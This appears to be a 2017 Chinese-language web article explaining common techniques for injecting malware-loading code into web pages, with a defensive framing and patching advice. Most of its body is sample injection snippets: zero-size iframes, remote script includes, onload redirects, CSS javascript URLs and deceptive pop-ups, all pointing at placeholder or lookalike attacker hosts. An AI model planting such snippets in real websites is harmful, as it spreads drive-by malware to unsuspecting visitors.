內容字號:默認大號超大號

段落設置:段首縮進取消段首縮進

字體設置:切換到微軟雅黑切換到宋體

各種網頁掛馬方式原理揭密(iframe掛馬,script 掛馬,圖片偽裝掛馬等)

2017-06-08 17:10 出處:電腦高手網整理 人氣: 評論(0

下面介紹集中常見的網頁掛馬方式:

(1)iframe 框架掛馬

在網頁上增加一行掛馬的程序,例如:
<iframe src=http://www.xxx.com/xxx.html width=0 height=0></iframe>
這種嵌入是的掛馬非常常見,在Google中搜索發現的可能還有木馬的網頁,一般都是被這種方式掛馬。這行語句就是在網頁打開的時候,同時打開另外一個網頁,當然這個網頁可能包含大量的木馬,也可能僅僅是為了騙取流量。
如果我們的網頁不使用iframe,我們可以屏蔽iframe屬性,這樣,即使網頁被iframe掛馬,也不會傷害到訪問網站的用戶。
【原理】:
IE5及其以后版本支持在CSS中使用expression,用來把CSS屬性和JavaScript腳本關聯起來,這里的CSS屬性可以是元素固有的屬性,也可以是自定義屬性。
我們在網頁中增加如下的代碼即可屏蔽iframe屬性:

<style type=”text/css”>
iframe{a:expression(this.src=’about:blank’,this.outerHTML=”);}
</style>
iframe 也可以采用加密的方式掛馬,例如下面的代碼:
<iframe src=http://google-analitecs.com/in.cgi????? width=1 height=1></iframe>

(2)script 掛馬

通過script的調用來掛馬,可以掛直接的html文件,也可以掛js文件,可以明文掛馬,為了躲避追查,也有加密掛馬的形式,形式各異,千差萬別,主要方式如下:
<script src=http://%11%11%11%11%11%11%11></script>
這是一個加密的掛馬語句;
2.1 htm文件掛馬:

通過上傳一個木馬文件(x.htm)掛馬,代碼如下:
document.write(“<div style=’display:none’>”)
document.write(“<iframe src=x.htm width=0 height=0></iframe>”)
document.write(“</div>”)
htm 掛馬代碼:
<script src=x.htm></script>

2.2 js文件掛馬

通過上傳一個木馬文件(x.js)掛馬,代碼如下:
document.write(“<iframe width=’0′ height=’0′ src=’http://xxx.com/xxx.htm’></iframe>”);

 
JS掛馬代碼:
<script language=javascript src=x.js></script>
當然也可以掛互聯網上任何一臺機器的x.js文件;
2.3  js變形加密
<SCRIPT language=”JScript.Encode” src=http://www.xxx.com/x.x></script>

(3)圖片偽裝掛馬

隨著防毒技術的發展,圖片木馬技術逃避殺毒監視的新技術,攻擊者將類似:http://www.xxx.com/x.htm中的木馬代碼植入到x.gif圖片文
件中,這些嵌入代碼的圖片都可以用工具生成。圖片木馬生成后,再利用代碼調用執行,是比較新穎的一種掛馬隱蔽方法,實例代碼如:

<html>
<iframe src=”http://www.x.com/x.htm” height=0 width=0></iframe>
<img src=”http://www.x.com/x.jpg”></center>
</html>

當用戶打開http://www.x.com/x.htm是,顯示給用戶的是http://www.x.com/x.jpg,而http://www.x.com/x.htm網頁代碼也隨之運行。

(4)其它的掛馬方式
4.1 body掛馬
<body onload=”window.location=’http://xxx.com/xxx.htm’;”></body>
也可以在css的body中掛馬
body {
background-image: url(‘javascript:document.write(“<script src=http://www.xxx.com/x.js></script>”)’)}
4.2 隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML +
‘\r\n<iframe src=”http://www.xxx.com/xxx.htm/”></iframe>’;
4.3 java的open函數掛馬
直接調用:
<SCRIPT language=javascript>
window.open (“x.htm”,””,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1″);
</script>
欺騙調用:

<a href=”http://www.a.com(迷惑連接地址,顯示這個地址指向木馬地址)” onMouseOver=”www_a_com(); return true;”> 頁面要顯示的內容 </a>
<SCRIPT Language=”JavaScript”>
function www_a_com ()
{
var url=”網馬地址”;
open(url,”NewWindow”,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,w
idth=800,height=600,left=10,top=10″);
}
</SCRIPT>

4.4 偽裝調用:

<frameset rows=”444,0″ cols=”*”>
<frame src=”a.htm” framborder=”no” scrolling=”auto” noresize marginwidth=”0″margingheight=”0″>
<frame src=”b.htm” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″>
</frameset>

形形色色的網頁掛馬,代碼都十分簡單,所以,互聯網木馬想要傳播,就會不停的開發新的掛馬方式,不停的加密隱藏自己,這樣才能逃過各種安全軟件的眼睛。其實,看看上文,很多語句都是編程常用的代碼,只是使用的目的不一樣罷了,了解了網頁掛馬的原理和方法,再防范網頁掛馬就容易多了。
帶木馬的網頁主要包括兩種類型:一種自己本身就是木馬網站,所有的頁面都有木馬,另一種是正常的網站,由于管理不善,被掛馬,成為木馬網站的一個中轉站,看看google中這樣的網站何其多,可能很多站長現在還不知道,呵呵,多學習學習吧,站長可不是那么好當的。
不過,僅僅有了網絡掛馬的代碼,也不一定一定能傳播木馬,只要我們加強防范,不讓我們的網頁被 掛馬,甚至,即使被掛馬了,打開了木馬網頁,我們的系統沒有漏洞,木馬網頁也同樣不能發揮作用的。所以,最重要的安全防范方式就是定期給系統打補丁,幾乎 所有的木馬網頁都無法發揮作用了。

相關欄目

相關文章



分享給小伙伴們:

評論

發表評論愿您的每句評論,都能給大家的生活添色彩,帶來共鳴,帶來思索,帶來快樂。

簽名: 驗證碼: 點擊我更換圖片

評論列表

    © 2002-2017 dngsw.cn 電腦高手網 版權所有

    粵ICP備13005586號-3

    26选5开奖